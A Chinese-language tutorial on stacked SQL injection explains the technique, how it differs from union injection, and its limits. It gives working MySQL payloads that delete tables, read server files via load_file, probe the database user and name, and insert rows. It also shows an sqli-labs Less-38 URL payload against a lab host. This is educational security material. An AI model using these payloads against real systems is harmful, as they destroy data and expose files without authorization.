Stached injection -- 堆疊注入
0x00 堆疊注入的定義
Stacked injection 漢語翻譯過來后,稱 為堆查詢注入,也有稱之為堆疊注入。堆疊注入為攻擊者提供了很多的攻擊手段,通過添加一個新的查詢或者終止查詢,可以達到修改數據和調用存儲過程的目的。
0x01 堆疊注入的原理
在SQL中,分號(;)是用來表示一條sql語句的結束。試想一下我們在 ; 結束一個sql語句后繼續構造下一條語句,會不會一起執行?因此這個想法也就造就了堆疊注入。
而 union injection(聯合注入)也是將兩條語句合並在一起,兩者之間有什么區別么?區別就在於union 或者union all 執行的語句類型是有限的,只可以用來執行查詢語句,而堆疊注入可以執行的是任意的語句。例如以下這個例子。用戶輸入:1; DELETE FROM products,則服務器端生成的sql語句為:
Select * from products where productid=1;DELETE FROM products
當執行命令后,第一條顯示查詢信息,第二條則將整個表進行刪除。
0x02 堆疊注入的局限性
堆疊注入也有其相對的局限性,並不是每一個環境下都可以執行,可能受到API或者數據庫引擎不支持的限制,當然了權限不足也可以解釋為什么攻擊者無法修改數據或者調用一些程序。
如圖:
雖然我們前面提到了堆疊查詢可以執行任意的sql語句,但是這種注入方式並不是十分的完美的。在我們的web系統中,因為代碼通常只返回一個查詢結果,因此,堆疊注入第二個語句產生錯誤或者結果只能被忽略,我們在前端界面是無法看到返回結果的。因此,在讀取數據時,還是建議使用 union(聯合)注入。同時在使用堆疊注入之前,我們也是需要知道一些數據庫相關信息的,例如表名,列名等信息。
0x03 數據庫實例介紹
因為筆者接觸數據庫不多,所以下面我們從MySQL數據庫角度出發,介紹一些數據庫的基本操作,增刪查改,以下列出數據庫相關堆疊注入的基本操作。至於其他數據庫,大家可以自己實踐。
MySQL數據庫實例
(1)新建表
select * from user where id = 1;create table test like user;
可以看到,我們的語句執行成功,再去檢查一下表test是否創建成功。
show tables;
實驗顯示:表test成功創建。
(2)刪除新建的test表
select * from user where id=1;drop table test;
再去查看:
show tables;
(3) 查詢數據庫
select * from user where id=1;select 1,user(),database();
(4)加載文件
select * from user where id=1;select load_file('e:/test.txt');
(5)修改數據
select * from user where id=1;insert into user(username,password,address,sex,age) values ('范冰冰','123456','北京',2,26);
查看結果:
可以看到,我們剛剛添加的數據已經寫入了數據庫。
0x04 堆疊注入之sqli-labs實例
Less-38 堆疊注入 - 字符型 - GET
由下圖測試我們可以看到,只有3條數據:
我們使用堆疊注入,向該數據表插入一條數據:
http://192.168.26.130/sqli/Less-38/?id=1’;insert into users(id,username,password) values (‘38’,’less38’,’ruoli’) --+
可以看到,數據已經發生了變化,
好了,有時間了我會補充一個CTF中遇到的堆疊注入題材,以示補充。